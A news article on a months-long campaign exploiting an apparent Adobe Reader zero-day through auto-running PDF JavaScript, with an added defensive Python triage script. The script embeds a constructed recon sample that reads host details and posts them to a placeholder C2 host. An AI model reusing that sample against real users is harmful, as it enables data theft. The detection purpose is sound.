Hackers have been quietly exploiting what appears to be a zero-day in Adobe Acrobat Reader for months, using booby-trapped PDFs to profile targets and decide who's worth fully compromising.
Security researcher Haifei Li, founder of the sandbox-based exploit detection system EXPMON, said the campaign uses a malicious PDF whose payload fires as soon as the file is opened, working against even up-to-date Reader installations with no clicks required beyond viewing the document.
The exploit leans on heavily obfuscated JavaScript embedded in the PDF. Instead of detonating straight away, it starts pulling information from the machine through built-in Acrobat APIs, including local files and system details, and sends it back to servers under the attacker's control.
The first pass is basically recon. It grabs OS info, language settings, and file paths to figure out what it's landed on. If the box looks useful, it pulls a second-stage payload and runs it inside Reader. Researchers say that stage could escalate things further, up to remote code execution or even a sandbox escape.
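The detection side of what the article describes, as an added example (not code from The Register, EXPMON or Adobe): a static triage check a defender can run over inbound PDFs to flag documents that wire JavaScript to an auto-execution hook such as /OpenAction or /AA. It undoes the two tricks that defeat naive string matching on PDFs, #xx hex escaping of name tokens and FlateDecode compression of the script stream, and reports which Acrobat APIs the script touches. The list of fingerprinting APIs and both sample PDFs are constructed for this example to mirror the behaviour the article describes; they are not indicators from the campaign.

```python
"""
Static triage for PDFs that execute JavaScript on open, the delivery path the
article describes. Added example: not code from The Register, EXPMON or Adobe.
Works on raw PDF 1.7 syntax; the sample PDFs at the bottom are constructed.
"""
import re
import zlib

# Auto-execution hooks: the catalog's /OpenAction, and /AA (additional
# actions) dictionaries that fire on page-open or form-field events.
TRIGGER_RES = (re.compile(rb"/OpenAction(?![A-Za-z0-9])"),
               re.compile(rb"/AA(?![A-Za-z0-9])"))
# JavaScript action markers (/S /JavaScript with the script in /JS).
JS_RES = (re.compile(rb"/JavaScript(?![A-Za-z0-9])"),
          re.compile(rb"/JS(?![A-Za-z0-9])"))
# Acrobat JavaScript APIs that expose the host details the article says the
# first stage collects (OS, language, paths) or that can ship them out.
# Assumption: a starting list chosen for this example, not a published IOC set.
FINGERPRINT_APIS = ("app.platform", "app.language", "app.viewerVersion",
                    "this.path", "app.launchURL", "submitForm")
OBFUSCATION_HINTS = ("eval(", "unescape(", "fromCharCode")

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
NAME_RE = re.compile(rb"/([A-Za-z0-9#_.\-]+)")


def inflate_streams(data: bytes) -> bytes:
    """Append an inflated copy of every zlib-compressed stream body, so script
    hidden behind /FlateDecode is visible to the string scan below."""
    inflated = []
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates a trailing checksum byte that the regex
            # may have swallowed as the line ending before 'endstream'.
            inflated.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not zlib: a filter this example does not handle
    return data + b"\n" + b"\n".join(inflated)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes in name tokens (/J#61vaScript -> /JavaScript).
    The escape is legal PDF syntax and a routine way to dodge string matching."""
    def unescape(m):
        return b"/" + re.sub(rb"#([0-9A-Fa-f]{2})",
                             lambda h: bytes([int(h.group(1), 16)]), m.group(1))
    return NAME_RE.sub(unescape, data)


def triage_pdf(data: bytes) -> dict:
    """Count indicators and decide whether the PDF wires JavaScript to an
    automatic trigger; also report which fingerprinting APIs the script uses."""
    view = normalize_names(inflate_streams(data))
    text = view.decode("latin-1")
    triggers = sum(len(r.findall(view)) for r in TRIGGER_RES)
    js_markers = sum(len(r.findall(view)) for r in JS_RES)
    return {
        "auto_run_js": triggers > 0 and js_markers > 0,
        "triggers": triggers,
        "js_markers": js_markers,
        "fingerprint_apis": [a for a in FINGERPRINT_APIS if a in text],
        "obfuscation_hints": [h for h in OBFUSCATION_HINTS if h in text],
    }


def _pdf(objects):
    """Assemble a minimal PDF from a list of object bodies (constructed test data)."""
    out = [b"%PDF-1.7\n"]
    for i, body in enumerate(objects, start=1):
        out.append(b"%d 0 obj %s endobj\n" % (i, body))
    out.append(b"trailer << /Root 1 0 R >>\n%%EOF\n")
    return b"".join(out)


# Constructed recon-style script: reads OS, language and path, carries a
# token eval(unescape()) wrapper, and posts to a placeholder host. Not the
# campaign's code.
_RECON_JS = (b"var o=app.platform,l=app.language,p=this.path;"
             b"eval(unescape('%76%61%72%20%78%3d%31%3b'));"
             b"this.submitForm({cURL:'http://c2.example.invalid/',cSubmitAs:'HTML'});")
_DEFLATED = zlib.compress(_RECON_JS)

MALICIOUS_SAMPLE = _pdf([
    b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
    b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
    b"<< /Type /Page /Parent 2 0 R >>",
    b"<< /S /J#61vaScript /JS 5 0 R >>",  # hex-escaped action type
    b"<< /Length %d /Filter /FlateDecode >>\nstream\n%s\nendstream"
    % (len(_DEFLATED), _DEFLATED),
])

BENIGN_SAMPLE = _pdf([
    b"<< /Type /Catalog /Pages 2 0 R >>",
    b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
    b"<< /Type /Page /Parent 2 0 R >>",
])

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage_pdf(sample))
```

Treat this as a first-pass filter, not a verdict: it only inflates Flate-compressed streams, so scripts behind other filters, inside object streams, or in encrypted documents need a real PDF parser (Didier Stevens' pdf-parser.py or peepdf are the usual choices), and a hit on /OpenAction plus /JavaScript is common in legitimate forms. The point of the example is the two normalisation steps; matching on the literal string "/JavaScript" alone misses a file that spells it /J#61vaScript.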
"Such a mechanism allows the threat actor to collect user information, steal local data, perform advanced 'fingerprinting', and launch future attacks," Li said. "If the target meets the attacker's conditions, the attacker may deliver additional exploit to achieve RCE or SBX."
In other words, not every victim gets the same treatment. Some systems are only profiled, while others receive a second-stage payload, which suggests a more targeted approach.
There are also early clues about who those targets might be. Another researcher, Gi7w0rm, found that lure documents tied to the exploit contain Russian-language content referencing current events in the country's oil and gas sector. That doesn't prove attribution, but it does suggest the attackers had a specific audience in mind rather than casting a wide net.
What makes this whole thing more than just another PDF bug is how long it appears to have gone unnoticed. Li pointed to a related sample uploaded to VirusTotal on November 28, 2025, suggesting the campaign had been active for at least four months before it was spotted. That puts activity back in late 2025, even though it only came to light in March.
There's still no CVE, no patch, and Adobe hasn't said anything publicly or responded to The Register's questions. That leaves users exposed for now, especially if they're in the habit of opening PDFs from unknown sources. The one lever users do have in the meantime is Reader's own JavaScript switch: unticking "Enable Acrobat JavaScript" under Edit > Preferences > JavaScript removes the execution path this campaign depends on, at the cost of breaking forms and documents that rely on scripting. ®
Source: The Register